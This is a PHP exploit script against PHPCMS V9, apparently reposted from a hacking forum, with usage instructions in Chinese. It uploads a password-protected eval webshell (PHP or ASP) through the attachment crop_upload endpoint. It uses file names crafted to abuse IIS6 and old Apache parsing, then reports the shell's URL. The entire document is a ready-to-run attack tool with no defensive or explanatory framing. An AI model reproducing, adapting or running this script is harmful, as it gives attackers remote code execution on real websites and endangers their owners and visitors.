phpcms V9 getshell exp

冰刀

1. #!usr/bin/php -w
   
2. 
   
3. <?php
   
4. 
   
5. error_reporting(E_ERROR);
   
6. 
   
7. set_time_limit(0);
   
8. 
   
9. $pass="fuck";
   
10. 
    
11. print_r('
    
12. 
    
13. +---------------------------------------------------------------------------+
    
14. 
    
15. PHPCms V9 GETSHELL 0DAY
    
16. c0de by testr00ttest
    
17. 
    
18. 针对iis6.0的漏洞 有点鸡肋 但是也可以用
    
19. 
    
20. apache 是老版本可能会产生问题
    
21. 
    
22. +---------------------------------------------------------------------------+
    
23. 
    
24. ');
    
25. 
    
26. echo '密码为'.$pass;
    
27. 
    
28. if ($argc < 2) {
    
29. 
    
30. print_r('
    
31. 
    
32. +---------------------------------------------------------------------------+
    
33. 
    
34. Usage: php '.$argv[0].' url [js]
    
35. js 类型配置  1为asp 2为php  3为apache 的版本
    
36. 
    
37. Example:
    
38. 
    
39. php '.$argv[0].' localhost 1
    
40. +---------------------------------------------------------------------------+
    
41. 
    
42. ');
    
43. 
    
44. exit;
    
45. 
    
46. }
    
47. 
    
48. $url=$argv[1];
    
49. 
    
50. $js=$argv[2];//写入脚本类型
    
51. 
    
52. 
    
53. $phpshell='<?php @eval($_POST[\''.$pass.'\']);?>';
    
54. 
    
55. $aspshell='<%eval request("'.$pass.'")%>';
    
56. 
    
57. 
    
58. if($js==1){
    
59. 
    
60.         $file="1.asp;1.jpg";
    
61. 
    
62.          $ret=GetShell($url,$aspshell,$file);
    
63. 
    
64.         
    
65. 
    
66. }else if($js==2){
    
67. 
    
68.         $file="1.php;1.jpg";
    
69. 
    
70.         $ret=GetShell($url,$phpshell,$file);
    
71. 
    
72. }else if($js==3){
    
73. 
    
74.         $file="1.php.jpg";
    
75. 
    
76.         $ret=GetShell($url,$phpshell,$file);
    
77. 
    
78. }else{
    
79. 
    
80.         print_r('没有选择脚本类型');
    
81. 
    
82. }
    
83. 
    
84. $pattern = "|http:\/\/[^,]+?\.jpg,?|U";
    
85. 
    
86. preg_match_all($pattern, $ret, $matches);
    
87. 
    
88. if($matches[0][0]){
    
89. 
    
90.         echo "\r\nurl地址:".$matches[0][0];
    
91. 
    
92. }else{
    
93. 
    
94.         echo "\r\n没得到！";        
    
95. 
    
96. }
    
97. 
    
98. 
    
99. function GetShell($url,$shell,$js){
    
100. 
     
101.         $content =$shell;
     
102. 
     
103.         $data = "POST /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$url."/uploadfile/".$js." HTTP/1.1\r\n";
     
104.         $data .= "Host: ".$url."\r\n";
     
105. 
     
106.         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
     
107. 
     
108.         $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
     
109. 
     
110.         $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
     
111. 
     
112.         $data .= "Connection: close\r\n";
     
113. 
     
114.         $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
     
115. 
     
116.         $data .= $content."\r\n";
     
117. 
     
118.         //echo $data;
     
119. 
     
120.         $ock=fsockopen($url,80);
     
121. 
     
122.         if (!$ock) {
     
123. 
     
124.         echo "  No response from ".$url."\n";
     
125. 
     
126.         }
     
127. 
     
128.         fwrite($ock,$data);
     
129. 
     
130.         $resp = '';
     
131. 
     
132.         while (!feof($ock)) {
     
133. 
     
134.                 $resp.=fread($ock, 1024);
     
135. 
     
136.         }
     
137. 
     
138.         return $resp;
     
139. 
     
140. }
     
141. 
     
142. 
     
143. 
     
144. ?>

复制代码

转载与http://team.f4ck.net